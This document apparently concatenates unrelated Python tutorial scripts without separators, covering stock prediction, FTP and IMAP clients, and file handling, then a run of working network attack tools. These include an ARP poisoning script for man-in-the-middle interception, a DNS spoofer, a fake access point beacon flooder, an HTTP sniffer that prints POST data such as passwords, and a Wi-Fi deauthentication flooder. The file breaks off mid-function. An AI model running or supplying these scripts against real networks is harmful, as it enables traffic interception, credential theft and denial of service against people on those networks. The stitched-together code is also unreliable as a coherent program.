y_test = list(map(lambda current, future: int(float(future) > float(current)), y_test[:-LOOKUP_STEP], y_test[LOOKUP_STEP:]))
return accuracy_score(y_test, y_pred)
def predict(model, data, classification=False):
# retrieve the last sequence from data
last_sequence = data["last_sequence"][:N_STEPS]
# retrieve the column scalers
column_scaler = data["column_scaler"]
# reshape the last sequence
last_sequence = last_sequence.reshape((last_sequence.shape[1], last_sequence.shape[0]))
# expand dimension
last_sequence = np.expand_dims(last_sequence, axis=0)
# get the prediction (scaled from 0 to 1)
prediction = model.predict(last_sequence)
# get the price (by inverting the scaling)
predicted_price = column_scaler["adjclose"].inverse_transform(prediction)[0][0]
return predicted_price
# load the data
data = load_data(ticker, N_STEPS, lookup_step=LOOKUP_STEP, test_size=TEST_SIZE,
feature_columns=FEATURE_COLUMNS, shuffle=False)
# construct the model
model = create_model(N_STEPS, loss=LOSS, units=UNITS, cell=CELL, n_layers=N_LAYERS,
dropout=DROPOUT, optimizer=OPTIMIZER)
model_path = os.path.join("results", model_name) + ".h5"
model.load_weights(model_path)
# evaluate the model
mse, mae = model.evaluate(data["X_test"], data["y_test"])
# calculate the mean absolute error (inverse scaling)
mean_absolute_error = data["column_scaler"]["adjclose"].inverse_transform(mae.reshape(1, -1))[0][0]
print("Mean Absolute Error:", mean_absolute_error)
# predict the future price
future_price = predict(model, data)
print(f"Future price after {LOOKUP_STEP} days is {future_price:.2f}")
print("Accuracy Score:", get_accuracy(model, data))
plot_graph(model, data)
from stock_prediction import create_model, load_data
from tensorflow.keras.layers import LSTM
from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard
import os
import pandas as pd
from parameters import *
# create these folders if they does not exist
if not os.path.isdir("results"):
os.mkdir("results")
if not os.path.isdir("logs"):
os.mkdir("logs")
if not os.path.isdir("data"):
os.mkdir("data")
# load the data
data = load_data(ticker, N_STEPS, lookup_step=LOOKUP_STEP, test_size=TEST_SIZE, feature_columns=FEATURE_COLUMNS)
# construct the model
model = create_model(N_STEPS, loss=LOSS, units=UNITS, cell=CELL, n_layers=N_LAYERS,
dropout=DROPOUT, optimizer=OPTIMIZER)
# some tensorflow callbacks
checkpointer = ModelCheckpoint(os.path.join("results", model_name), save_weights_only=True, save_best_only=True, verbose=1)
tensorboard = TensorBoard(log_dir=os.path.join("logs", model_name))
history = model.fit(data["X_train"], data["y_train"],
batch_size=BATCH_SIZE,
epochs=EPOCHS,
validation_data=(data["X_test"], data["y_test"]),
callbacks=[checkpointer, tensorboard],
verbose=1)
model.save(os.path.join("results", model_name) + ".h5")
import ftplib
FTP_HOST = "ftp.dlptest.com"
FTP_USER = "dlpuserdlptest.com"
FTP_PASS = "SzMf7rTE4pCrf9dV286GuNe4N"
# connect to the FTP server
ftp = ftplib.FTP(FTP_HOST, FTP_USER, FTP_PASS)
# force UTF-8 encoding
ftp.encoding = "utf-8"
# the name of file you want to download from the FTP server
filename = "some_file.txt"
with open(filename, "wb") as file:
# use FTP's RETR command to download the file
ftp.retrbinary(f"RETR {filename}", file.write)
# quit and close the connection
ftp.quit()
import ftplib
# FTP server credentials
FTP_HOST = "ftp.dlptest.com"
FTP_USER = "dlpuserdlptest.com"
FTP_PASS = "SzMf7rTE4pCrf9dV286GuNe4N"
# connect to the FTP server
ftp = ftplib.FTP(FTP_HOST, FTP_USER, FTP_PASS)
# force UTF-8 encoding
ftp.encoding = "utf-8"
# local file name you want to upload
filename = "some_file.txt"
with open(filename, "rb") as file:
# use FTP's STOR command to upload the file
ftp.storbinary(f"STOR {filename}", file)
# list current files & directories
ftp.dir()
# quit and close the connection
ftp.quit()
import random
import os
import string
import secrets
# generate random integer between a and b (including a and b)
randint = random.randint(1, 500)
print("randint:", randint)
# generate random integer from range
randrange = random.randrange(0, 500, 5)
print("randrange:", randrange)
# get a random element from this list
choice = random.choice(["hello", "hi", "welcome", "bye", "see you"])
print("choice:", choice)
# get 5 random elements from 0 to 1000
choices = random.choices(range(1000), k=5)
print("choices:", choices)
# generate a random floating point number from 0.0 <= x <= 1.0
randfloat = random.random()
print("randfloat between 0.0 and 1.0:", randfloat)
# generate a random floating point number such that a <= x <= b
randfloat = random.uniform(5, 10)
print("randfloat between 5.0 and 10.0:", randfloat)
l = list(range(10))
print("Before shuffle:", l)
random.shuffle(l)
print("After shuffle:", l)
# generate a random string
randstring = ''.join(random.sample(string.ascii_letters, 16))
print("Random string with 16 characters:", randstring)
# crypto-safe byte generation
randbytes_crypto = os.urandom(16)
print("Random bytes for crypto use using os:", randbytes_crypto)
# or use this
randbytes_crypto = secrets.token_bytes(16)
print("Random bytes for crypto use using secrets:", randbytes_crypto)
# crypto-secure string generation
randstring_crypto = secrets.token_urlsafe(16)
print("Random strings for crypto use:", randstring_crypto)
# crypto-secure bits generation
randbits_crypto = secrets.randbits(16)
print("Random 16-bits for crypto use:", randbits_crypto)
import os
# print the current directory
print("The current directory:", os.getcwd())
# make an empty directory (folder)
os.mkdir("folder")
# running mkdir again with the same name raises FileExistsError, run this instead:
# if not os.path.isdir("folder"):
# os.mkdir("folder")
# changing the current directory to 'folder'
os.chdir("folder")
# printing the current directory now
print("The current directory changing the directory to folder:", os.getcwd())
# go back a directory
os.chdir("..")
# make several nested directories
os.makedirs("nested1/nested2/nested3")
# create a new text file
text_file = open("text.txt", "w")
# write to this file some text
text_file.write("This is a text file")
# rename text.txt to renamed-text.txt
os.rename("text.txt", "renamed-text.txt")
# replace (move) this file to another directory
os.replace("renamed-text.txt", "folder/renamed-text.txt")
# print all files and folders in the current directory
print("All folders & files:", os.listdir())
# print all files & folders recursively
for dirpath, dirnames, filenames in os.walk("."):
# iterate over directories
for dirname in dirnames:
print("Directory:", os.path.join(dirpath, dirname))
# iterate over files
for filename in filenames:
print("File:", os.path.join(dirpath, filename))
# delete that file
os.remove("folder/renamed-text.txt")
# remove the folder
os.rmdir("folder")
# remove nested folders
os.removedirs("nested1/nested2/nested3")
open("text.txt", "w").write("This is a text file")
# print some stats about the file
print(os.stat("text.txt"))
# get the file size for example
print("File size:", os.stat("text.txt").st_size)
import ftplib
import os
from datetime import datetime
FTP_HOST = "ftp.ed.ac.uk"
FTP_USER = "anonymous"
FTP_PASS = ""
# some utility functions that we gonna need
def get_size_format(n, suffix="B"):
# converts bytes to scaled format (e.g KB, MB, etc.)
for unit in ["", "K", "M", "G", "T", "P"]:
if n < 1024:
return f"{n:.2f}{unit}{suffix}"
n /= 1024
def get_datetime_format(date_time):
# convert to datetime object
date_time = datetime.strptime(date_time, "%Y%m%d%H%M%S")
# convert to human readable date time string
return date_time.strftime("%Y/%m/%d %H:%M:%S")
# initialize FTP session
ftp = ftplib.FTP(FTP_HOST, FTP_USER, FTP_PASS)
# force UTF-8 encoding
ftp.encoding = "utf-8"
# print the welcome message
print(ftp.getwelcome())
# change the current working directory to 'pub' folder and 'maps' subfolder
ftp.cwd("pub/maps")
# LIST a directory
print("*"*50, "LIST", "*"*50)
ftp.dir()
# NLST command
print("*"*50, "NLST", "*"*50)
print("{:20} {}".format("File Name", "File Size"))
for file_name in ftp.nlst():
file_size = "N/A"
try:
ftp.cwd(file_name)
except Exception as e:
ftp.voidcmd("TYPE I")
file_size = get_size_format(ftp.size(file_name))
print(f"{file_name:20} {file_size}")
print("*"*50, "MLSD", "*"*50)
# using the MLSD command
print("{:30} {:19} {:6} {:5} {:4} {:4} {:4} {}".format("File Name", "Last Modified", "Size",
"Perm","Type", "GRP", "MODE", "OWNER"))
for file_data in ftp.mlsd():
# extract returning data
file_name, meta = file_data
# i.e directory, file or link, etc
file_type = meta.get("type")
if file_type == "file":
# if it is a file, change type of transfer data to IMAGE/binary
ftp.voidcmd("TYPE I")
# get the file size in bytes
file_size = ftp.size(file_name)
# convert it to human readable format (i.e in 'KB', 'MB', etc)
file_size = get_size_format(file_size)
else:
# not a file, may be a directory or other types
file_size = "N/A"
# date of last modification of the file
last_modified = get_datetime_format(meta.get("modify"))
# file permissions
permission = meta.get("perm")
# get the file unique id
unique_id = meta.get("unique")
# user group
unix_group = meta.get("unix.group")
# file mode, unix permissions
unix_mode = meta.get("unix.mode")
# owner of the file
unix_owner = meta.get("unix.owner")
# print all
print(f"{file_name:30} {last_modified:19} {file_size:7} {permission:5} {file_type:4} {unix_group:4} {unix_mode:4} {unix_owner}")
# quit and close the connection
ftp.quit()
import imaplib
import email
from email.header import decode_header
import webbrowser
import os
# account credentials
username = "youremailaddressprovider.com"
password = "yourpassword"
# number of top emails to fetch
N = 3
# create an IMAP4 class with SSL, use your email provider's IMAP server
imap = imaplib.IMAP4_SSL("imap.gmail.com")
# authenticate
imap.login(username, password)
# select a mailbox (in this case, the inbox mailbox)
# use imap.list() to get the list of mailboxes
status, messages = imap.select("INBOX")
# total number of emails
messages = int(messages[0])
for i in range(messages-4, messages-N-4, -1):
# fetch the email message by ID
res, msg = imap.fetch(str(i), "(RFC822)")
for response in msg:
if isinstance(response, tuple):
# parse a bytes email into a message object
msg = email.message_from_bytes(response[1])
# decode the email subject
subject = decode_header(msg["Subject"])[0][0]
if isinstance(subject, bytes):
# if it's a bytes, decode to str
subject = subject.decode()
# email sender
from_ = msg.get("From")
print("Subject:", subject)
print("From:", from_)
# if the email message is multipart
if msg.is_multipart():
# iterate over email parts
for part in msg.walk():
# extract content type of email
content_type = part.get_content_type()
content_disposition = str(part.get("Content-Disposition"))
try:
# get the email body
body = part.get_payload(decode=True).decode()
except:
pass
if content_type == "text/plain" and "attachment" not in content_disposition:
# print text/plain emails and skip attachments
print(body)
elif "attachment" in content_disposition:
# download attachment
filename = part.get_filename()
if filename:
if not os.path.isdir(subject):
# make a folder for this email (named after the subject)
os.mkdir(subject)
filepath = os.path.join(subject, filename)
# download attachment and save it
open(filepath, "wb").write(part.get_payload(decode=True))
else:
# extract content type of email
content_type = msg.get_content_type()
# get the email body
body = msg.get_payload(decode=True).decode()
if content_type == "text/plain":
# print only text email parts
print(body)
if content_type == "text/html":
# if it's HTML, create a new HTML file and open it in browser
if not os.path.isdir(subject):
# make a folder for this email (named after the subject)
os.mkdir(subject)
filename = f"{subject[:50]}.html"
filepath = os.path.join(subject, filename)
# write the file
open(filepath, "w").write(body)
# open in the default browser
webbrowser.open(filepath)
print("="*100)
# close the connection and logout
imap.close()
imap.logout()
import requests
from concurrent.futures import ThreadPoolExecutor
from time import perf_counter
# number of threads to spawn
n_threads = 5
# read 1024 bytes every time
buffer_size = 1024
def download(url):
# download the body of response by chunk, not immediately
response = requests.get(url, stream=True)
# get the file name
filename = url.split("/")[-1]
with open(filename, "wb") as f:
for data in response.iter_content(buffer_size):
# write data read to the file
f.write(data)
if __name__ == "__main__":
urls = [
"https://cdn.pixabay.com/photo/2018/01/14/23/12/nature-3082832__340.jpg",
"https://cdn.pixabay.com/photo/2013/10/02/23/03/dawn-190055__340.jpg",
"https://cdn.pixabay.com/photo/2016/10/21/14/50/plouzane-1758197__340.jpg",
"https://cdn.pixabay.com/photo/2016/11/29/05/45/astronomy-1867616__340.jpg",
"https://cdn.pixabay.com/photo/2014/07/28/20/39/landscape-404072__340.jpg",
] * 5
t = perf_counter()
with ThreadPoolExecutor(max_workers=n_threads) as pool:
pool.map(download, urls)
print(f"Time took: {perf_counter() - t:.2f}s")
import requests
from threading import Thread
from queue import Queue
# thread-safe queue initialization
q = Queue()
# number of threads to spawn
n_threads = 5
# read 1024 bytes every time
buffer_size = 1024
def download():
global q
while True:
# get the url from the queue
url = q.get()
# download the body of response by chunk, not immediately
response = requests.get(url, stream=True)
# get the file name
filename = url.split("/")[-1]
with open(filename, "wb") as f:
for data in response.iter_content(buffer_size):
# write data read to the file
f.write(data)
# we're done downloading the file
q.task_done()
if __name__ == "__main__":
urls = [
"https://cdn.pixabay.com/photo/2018/01/14/23/12/nature-3082832__340.jpg",
"https://cdn.pixabay.com/photo/2013/10/02/23/03/dawn-190055__340.jpg",
"https://cdn.pixabay.com/photo/2016/10/21/14/50/plouzane-1758197__340.jpg",
"https://cdn.pixabay.com/photo/2016/11/29/05/45/astronomy-1867616__340.jpg",
"https://cdn.pixabay.com/photo/2014/07/28/20/39/landscape-404072__340.jpg",
] * 5
# fill the queue with all the urls
for url in urls:
q.put(url)
# start the threads
for t in range(n_threads):
worker = Thread(target=download)
# daemon thread means a thread that will end when the main thread ends
worker.daemon = True
worker.start()
# wait until the queue is empty
q.join()
import requests
from time import perf_counter
# read 1024 bytes every time
buffer_size = 1024
def download(url):
# download the body of response by chunk, not immediately
response = requests.get(url, stream=True)
# get the file name
filename = url.split("/")[-1]
with open(filename, "wb") as f:
for data in response.iter_content(buffer_size):
# write data read to the file
f.write(data)
if __name__ == "__main__":
urls = [
"https://cdn.pixabay.com/photo/2018/01/14/23/12/nature-3082832__340.jpg",
"https://cdn.pixabay.com/photo/2013/10/02/23/03/dawn-190055__340.jpg",
"https://cdn.pixabay.com/photo/2016/10/21/14/50/plouzane-1758197__340.jpg",
"https://cdn.pixabay.com/photo/2016/11/29/05/45/astronomy-1867616__340.jpg",
"https://cdn.pixabay.com/photo/2014/07/28/20/39/landscape-404072__340.jpg",
] * 5
t = perf_counter()
for url in urls:
download(url)
print(f"Time took: {perf_counter() - t:.2f}s")
from scapy.all import Ether, ARP, srp, sniff, conf
def get_mac(ip):
"""
Returns the MAC address of ip, if it is unable to find it
for some reason, throws IndexError
"""
p = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip)
result = srp(p, timeout=3, verbose=False)[0]
return result[0][1].hwsrc
def process(packet):
# if the packet is an ARP packet
if packet.haslayer(ARP):
# if it is an ARP response (ARP reply)
if packet[ARP].op == 2:
try:
# get the real MAC address of the sender
real_mac = get_mac(packet[ARP].psrc)
# get the MAC address from the packet sent to us
response_mac = packet[ARP].hwsrc
# if they're different, definetely there is an attack
if real_mac != response_mac:
print(f"[!] You are under attack, REAL-MAC: {real_mac.upper()}, FAKE-MAC: {response_mac.upper()}")
except IndexError:
# unable to find the real mac
# may be a fake IP or firewall is blocking packets
pass
if __name__ == "__main__":
import sys
try:
iface = sys.argv[1]
except IndexError:
iface = conf.iface
sniff(store=False, prn=process, iface=iface)
from scapy.all import Ether, ARP, srp, send
import argparse
import time
import os
import sys
def _enable_linux_iproute():
"""
Enables IP route ( IP Forward ) in linux-based distro
"""
file_path = "/proc/sys/net/ipv4/ip_forward"
with open(file_path) as f:
if f.read() == 1:
# already enabled
return
with open(file_path, "w") as f:
print(1, file=f)
def _enable_windows_iproute():
"""
Enables IP route (IP Forwarding) in Windows
"""
from services import WService
# enable Remote Access service
service = WService("RemoteAccess")
service.start()
def enable_ip_route(verbose=True):
"""
Enables IP forwarding
"""
if verbose:
print("[!] Enabling IP Routing...")
_enable_windows_iproute() if "nt" in os.name else _enable_linux_iproute()
if verbose:
print("[!] IP Routing enabled.")
def get_mac(ip):
"""
Returns MAC address of any device connected to the network
If ip is down, returns None instead
"""
ans, _ = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip), timeout=3, verbose=0)
if ans:
return ans[0][1].src
def spoof(target_ip, host_ip, verbose=True):
"""
Spoofs target_ip saying that we are host_ip.
it is accomplished by changing the ARP cache of the target (poisoning)
"""
# get the mac address of the target
target_mac = get_mac(target_ip)
# craft the arp 'is-at' operation packet, in other words an ARP response
# we don't specify 'hwsrc' (source MAC address)
# because by default, 'hwsrc' is the real MAC address of the sender (ours)
arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at')
# send the packet
# verbose = 0 means that we send the packet without printing any thing
send(arp_response, verbose=0)
if verbose:
# get the MAC address of the default interface we are using
self_mac = ARP().hwsrc
print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac))
def restore(target_ip, host_ip, verbose=True):
"""
Restores the normal process of a regular network
This is done by sending the original informations
(real IP and MAC of host_ip ) to target_ip
"""
# get the real MAC address of target
target_mac = get_mac(target_ip)
# get the real MAC address of spoofed (gateway, i.e router)
host_mac = get_mac(host_ip)
# crafting the restoring packet
arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac)
# sending the restoring packet
# to restore the network to its normal process
# we send each reply seven times for a good measure (count=7)
send(arp_response, verbose=0, count=7)
if verbose:
print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="ARP spoof script")
parser.add_argument("target", help="Victim IP Address to ARP poison")
parser.add_argument("host", help="Host IP Address, the host you wish to intercept packets for (usually the gateway)")
parser.add_argument("-v", "--verbose", action="store_true", help="verbosity, default is True (simple message each second)")
args = parser.parse_args()
target, host, verbose = args.target, args.host, args.verbose
enable_ip_route()
try:
while True:
# telling the target that we are the host
spoof(target, host, verbose)
# telling the host that we are the target
spoof(host, target, verbose)
# sleep for one second
time.sleep(1)
except KeyboardInterrupt:
print("[!] Detected CTRL+C ! restoring the network, please wait...")
restore(target, host)
restore(host, target)
import win32serviceutil
import time
class WService:
def __init__(self, service, machine=None, verbose=False):
self.service = service
self.machine = machine
self.verbose = verbose
property
def running(self):
return win32serviceutil.QueryServiceStatus(self.service)[1] == 4
def start(self):
if not self.running:
win32serviceutil.StartService(self.service)
time.sleep(1)
if self.running:
if self.verbose:
print(f"[+] {self.service} started successfully.")
return True
else:
if self.verbose:
print(f"[-] Cannot start {self.service}")
return False
elif self.verbose:
print(f"[!] {self.service} is already running.")
def stop(self):
if self.running:
win32serviceutil.StopService(self.service)
time.sleep(0.5)
if not self.running:
if self.verbose:
print(f"[+] {self.service} stopped successfully.")
return True
else:
if self.verbose:
print(f"[-] Cannot stop {self.service}")
return False
elif self.verbose:
print(f"[!] {self.service} is not running.")
def restart(self):
if self.running:
win32serviceutil.RestartService(self.service)
time.sleep(2)
if self.running:
if self.verbose:
print(f"[+] {self.service} restarted successfully.")
return True
else:
if self.verbose:
print(f"[-] Cannot start {self.service}")
return False
elif self.verbose:
print(f"[!] {self.service} is not running.")
def main(action, service):
service = WService(service, verbose=True)
if action == "start":
service.start()
elif action == "stop":
service.stop()
elif action == "restart":
service.restart()
# getattr(remoteAccessService, action, "start")()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Windows Service Handler")
parser.add_argument("service")
parser.add_argument("-a", "--action", help="action to do, 'start', 'stop' or 'restart'",
action="store", required=True, dest="action")
given_args = parser.parse_args()
service, action = given_args.service, given_args.action
main(action, service)
from scapy.all import *
import time
hosts = []
Ether = 1
def listen_dhcp():
# Make sure it is DHCP with the filter options
k = sniff(prn=print_packet, filter='udp and (port 67 or port 68)')
def print_packet(packet):
target_mac, requested_ip, hostname, vendor_id = [None] * 4
if packet.haslayer(Ether):
target_mac = packet.getlayer(Ether).src
# get the DHCP options
dhcp_options = packet[DHCP].options
for item in dhcp_options:
try:
label, value = item
except ValueError:
continue
if label == 'requested_addr':
requested_ip = value
elif label == 'hostname':
hostname = value.decode()
elif label == 'vendor_class_id':
vendor_id = value.decode()
if target_mac and vendor_id and hostname and requested_ip and target_mac not in hosts:
hosts.append(target_mac)
time_now = time.strftime("[%Y-%m-%d - %H:%M:%S] ")
print("{}: {} - {} / {} requested {}".format(time_now, target_mac, hostname, vendor_id, requested_ip))
if __name__ == "__main__":
listen_dhcp()
from scapy.all import *
from netfilterqueue import NetfilterQueue
import os
# DNS mapping records, feel free to add/modify this dictionary
# for example, google.com will be redirected to 192.168.1.100
dns_hosts = {
b"www.google.com.": "192.168.1.100",
b"google.com.": "192.168.1.100",
b"facebook.com.": "172.217.19.142"
}
def process_packet(packet):
"""
Whenever a new packet is redirected to the netfilter queue,
this callback is called.
"""
# convert netfilter queue packet to scapy packet
scapy_packet = IP(packet.get_payload())
if scapy_packet.haslayer(DNSRR):
# if the packet is a DNS Resource Record (DNS reply)
# modify the packet
print("[Before]:", scapy_packet.summary())
try:
scapy_packet = modify_packet(scapy_packet)
except IndexError:
# not UDP packet, this can be IPerror/UDPerror packets
pass
print("[After ]:", scapy_packet.summary())
# set back as netfilter queue packet
packet.set_payload(bytes(scapy_packet))
# accept the packet
packet.accept()
def modify_packet(packet):
"""
Modifies the DNS Resource Record packet ( the answer part)
to map our globally defined dns_hosts dictionary.
For instance, whenver we see a google.com answer, this function replaces
the real IP address (172.217.19.142) with fake IP address (192.168.1.100)
"""
# get the DNS question name, the domain name
qname = packet[DNSQR].qname
if qname not in dns_hosts:
# if the website isn't in our record
# we don't wanna modify that
print("no modification:", qname)
return packet
# craft new answer, overriding the original
# setting the rdata for the IP we want to redirect (spoofed)
# for instance, google.com will be mapped to "192.168.1.100"
packet[DNS].an = DNSRR(rrname=qname, rdata=dns_hosts[qname])
# set the answer count to 1
packet[DNS].ancount = 1
# delete checksums and length of packet, because we have modified the packet
# new calculations are required ( scapy will do automatically )
del packet[IP].len
del packet[IP].chksum
del packet[UDP].len
del packet[UDP].chksum
# return the modified packet
return packet
if __name__ == "__main__":
QUEUE_NUM = 0
# insert the iptables FORWARD rule
os.system("iptables -I FORWARD -j NFQUEUE --queue-num {}".format(QUEUE_NUM))
# instantiate the netfilter queue
queue = NetfilterQueue()
try:
# bind the queue number to our callback process_packet
# and start it
queue.bind(QUEUE_NUM, process_packet)
queue.run()
except KeyboardInterrupt:
# if want to exit, make sure we
# remove that rule we just inserted, going back to normal.
os.system("iptables --flush")
from scapy.all import *
from threading import Thread
from faker import Faker
def send_beacon(ssid, mac, infinite=True):
dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=mac, addr3=mac)
# type=0: management frame
# subtype=8: beacon frame
# addr1: MAC address of the receiver
# addr2: MAC address of the sender
# addr3: MAC address of the Access Point (AP)
# beacon frame
beacon = Dot11Beacon()
# we inject the ssid name
essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
# stack all the layers and add a RadioTap
frame = RadioTap()/dot11/beacon/essid
# send the frame
if infinite:
sendp(frame, inter=0.1, loop=1, iface=iface, verbose=0)
else:
sendp(frame, iface=iface, verbose=0)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Fake Access Point Generator")
parser.add_argument("interface", default="wlan0mon", help="The interface to send beacon frames with, must be in monitor mode")
parser.add_argument("-n", "--access-points", dest="n_ap", help="Number of access points to be generated")
args = parser.parse_args()
n_ap = args.n_ap
iface = args.interface
# generate random SSIDs and MACs
faker = Faker()
ssids_macs = [ (faker.name(), faker.mac_address()) for i in range(n_ap) ]
for ssid, mac in ssids_macs:
Thread(target=send_beacon, args=(ssid, mac)).start()
from scapy.all import *
from scapy.layers.http import HTTPRequest # import HTTP packet
from colorama import init, Fore
# initialize colorama
init()
# define colors
GREEN = Fore.GREEN
RED = Fore.RED
RESET = Fore.RESET
def sniff_packets(iface=None):
"""
Sniff 80 port packets with iface, if None (default), then the
scapy's default interface is used
"""
if iface:
# port 80 for http (generally)
# process_packet is the callback
sniff(filter="port 80", prn=process_packet, iface=iface, store=False)
else:
# sniff with default interface
sniff(filter="port 80", prn=process_packet, store=False)
def process_packet(packet):
"""
This function is executed whenever a packet is sniffed
"""
if packet.haslayer(HTTPRequest):
# if this packet is an HTTP Request
# get the requested URL
url = packet[HTTPRequest].Host.decode() + packet[HTTPRequest].Path.decode()
# get the requester's IP Address
ip = packet[IP].src
# get the request method
method = packet[HTTPRequest].Method.decode()
print(f"\n{GREEN}[+] {ip} Requested {url} with {method}{RESET}")
if show_raw and packet.haslayer(Raw) and method == "POST":
# if show_raw flag is enabled, has raw data, and the requested method is "POST"
# then show raw
print(f"\n{RED}[*] Some useful Raw data: {packet[Raw].load}{RESET}")
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="HTTP Packet Sniffer, this is useful when you're a man in the middle." \
+ "It is suggested that you run arp spoof before you use this script, otherwise it'll sniff your personal packets")
parser.add_argument("-i", "--iface", help="Interface to use, default is scapy's default interface")
parser.add_argument("--show-raw", dest="show_raw", action="store_true", help="Whether to print POST raw data, such as passwords, search queries, etc.")
# parse arguments
args = parser.parse_args()
iface = args.iface
show_raw = args.show_raw
sniff_packets(iface)
from scapy.all import *
def deauth(target_mac, gateway_mac, inter=0.1, count=None, loop=1, iface="wlan0mon", verbose=1):
# 802.11 frame
# addr1: destination MAC
# addr2: source MAC
# addr3: Access Point MAC
dot11 = Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac)
# stack them up
packet = RadioTap()/dot11/Dot11Deauth(reason=7)
# send the packet
sendp(packet, inter=inter, count=count, loop=loop, iface=iface, verbose=verbose)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="A python script for sending deauthentication frames")
parser.add_argument("target", help="Target MAC address to deauthenticate.")
parser.add_argument("gateway", help="Gateway MAC address that target is authenticated with")
parser.add_argument("-c" , "--count", help="number of deauthentication frames to send, specify 0 to keep sending infinitely, default is 0", default=0)
parser.add_argument("--interval", help="The sending frequency between two frames sent, default is 100ms", default=0.1)
parser.add_argument("-i", dest="iface", help="Interface to use, must be in monitor mode, default is 'wlan0mon'", default="wlan0mon")
parser.add_argument("-v", "--verbose", help="wether to print messages", action="store_true")
args = parser.parse_args()
target = args.target
gateway = args.gateway
count = int(args.count)
interval = float(args.interval)
iface = args.iface
verbose = args.verbose
if count == 0:
# if count is 0, it means we loop forever (until interrupt)
loop = 1
count = None
else:
loop = 0
# printing some info messages"
if verbose:
if count:
print(f"[+] Sending {count} frames every {interval}s...")
else:
print(f"[+] Sending frames every {interval}s for ever...")
deauth(target, gateway, interval, count, loop, iface, verbose)
from scapy.all import ARP, Ether, srp
target_ip = "192.168.1.1/24"
# IP Address for the destination
# create ARP packet
arp = ARP(pdst=target_ip)
# create the Ether broadcast packet
# ff:ff:ff:ff:ff:ff MAC address indicates broadcasting
ether = Ether(dst="ff:ff:ff:ff:ff:ff")
# stack them
packet = ether/arp
result = srp(packet, timeout=3, verbose=0)[0]
# a list of clients, we will fill this in the upcoming loop
clients = []
for sent, received in result:
# for each response, append ip and mac address to clients list
clients.append({'ip': received.psrc, 'mac': received.hwsrc})
# print clients
print("Available devices in the network:")
print("IP" + " "*18+"MAC")
for client in clients:
print("{:16} {}".format(client['ip'], client['mac']))
from scapy.all import *
from threading import Thread
import pandas
import time
import os
import sys
# initialize the networks dataframe that will contain all access points nearby
networks = pandas.DataFrame(columns=["BSSID", "SSID", "dBm_Signal", "Channel", "Crypto"])
# set the index BSSID (MAC address of the AP)
networks.set_index("BSSID", inplace=True)
def callback(packet):
if packet.haslayer(Dot11Beacon):
# extract the MAC address of the network
bssid = packet[Dot11].addr2
# get the name of it
ssid = packet[Dot11Elt].info.decode()
try:
dbm_signal = packet.dBm_AntSignal
except:
dbm_signal = "N/A"
# extract network stats
stats = packet[Dot11Beacon].network_stats()
# get the channel of the AP
channel = stats.get("channel")
# get the crypto
crypto = stats.get("crypto")
networks.loc[bssid] = (ssid, dbm_signal, channel, crypto)
def print_all():
while True:
os.system("clear")
print(networks)
time.sleep(0.5)
def change_channel():
ch = 1
while True:
os.system(f"iwconfig {interface} channel {ch}")
# switch channel from 1 to 14 each 0.5s
ch = ch % 14 + 1
time.sleep(0.5)
if __name__ == "__main__":
# interface name, check using iwconfig
interface = sys.argv[1]
# start the thread that prints all the networks
printer = Thread(target=print_all)
printer.daemon = True
printer.start()
# start the channel changer
channel_changer = Thread(target=change_channel)
channel_changer.daemon = True
channel_changer.start()
# start sniffing
sniff(prn=callback, iface=interface)
import requests
import os
from tqdm import tqdm
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin, urlparse
def is_valid(url):
"""
Checks whether url is a valid URL.
"""
parsed = urlparse(url)
return bool(parsed.netloc) and bool(parsed.scheme)
def get_all_images(url):
"""
Returns all image URLs on a single url
"""
soup = bs(requests.get(url).content, "html.parser")
urls = []
for img in tqdm(soup.find_all("img"), "Extracting images"):
img_url = img.attrs.get("src")
if not img_url:
# if img does not contain src attribute, just skip
continue
# make the URL absolute by joining domain with the URL that is just extracted
img_url = urljoin(url, img_url)
# remove URLs like '/hsts-pixel.gif?c=3.2.5'
try:
pos = img_url.index("?")
img_url = img_url[:pos]
except ValueError:
pass
# finally, if the url is valid
if is_valid(img_url):
urls.append(img_url)
return urls
def download(url, pathname):
"""
Downloads a file given an URL and puts it in the folder pathname
"""
# if path doesn't exist, make that path dir
if not os.path.isdir(pathname):
os.makedirs(pathname)
# download the body of response by chunk, not immediately
response = requests.get(url, stream=True)
# get the total file size
file_size = int(response.headers.get("Content-Length", 0))
# get the file name
filename = os.path.join(pathname, url.split("/")[-1])
# progress bar, changing the unit to bytes instead of iteration (default by tqdm)
progress = tqdm(response.iter_content(1024), f"Downloading {filename}", total=file_size, unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "wb") as f:
for data in progress:
# write data read to the file
f.write(data)
# update the progress bar manually
progress.update(len(data))
def main(url, path):
# get all images
imgs = get_all_images(url)
for img in imgs:
# for each img, download it
download(img, path)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="This script downloads all images from a web page")
parser.add_argument("url", help="The URL of the web page you want to download images")
parser.add_argument("-p", "--path", help="The Directory you want to store your images, default is the domain of URL passed")
args = parser.parse_args()
url = args.url
path = args.path
if not path:
# if path isn't specified, use the domain name of that url as the folder name
path = urlparse(url).netloc
main(url, path)
from requests_html import HTMLSession
import requests
from tqdm import tqdm
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin, urlparse
import os
def is_valid(url):
"""
Checks whether url is a valid URL.
"""
parsed = urlparse(url)
return bool(parsed.netloc) and bool(parsed.scheme)
def get_all_images(url):
"""
Returns all image URLs on a single url
"""
# initialize the session
session = HTMLSession()
# make the HTTP request and retrieve response
response = session.get(url)
# execute Javascript
response.html.render()
# construct the soup parser
soup = bs(response.html.html, "html.parser")
urls = []
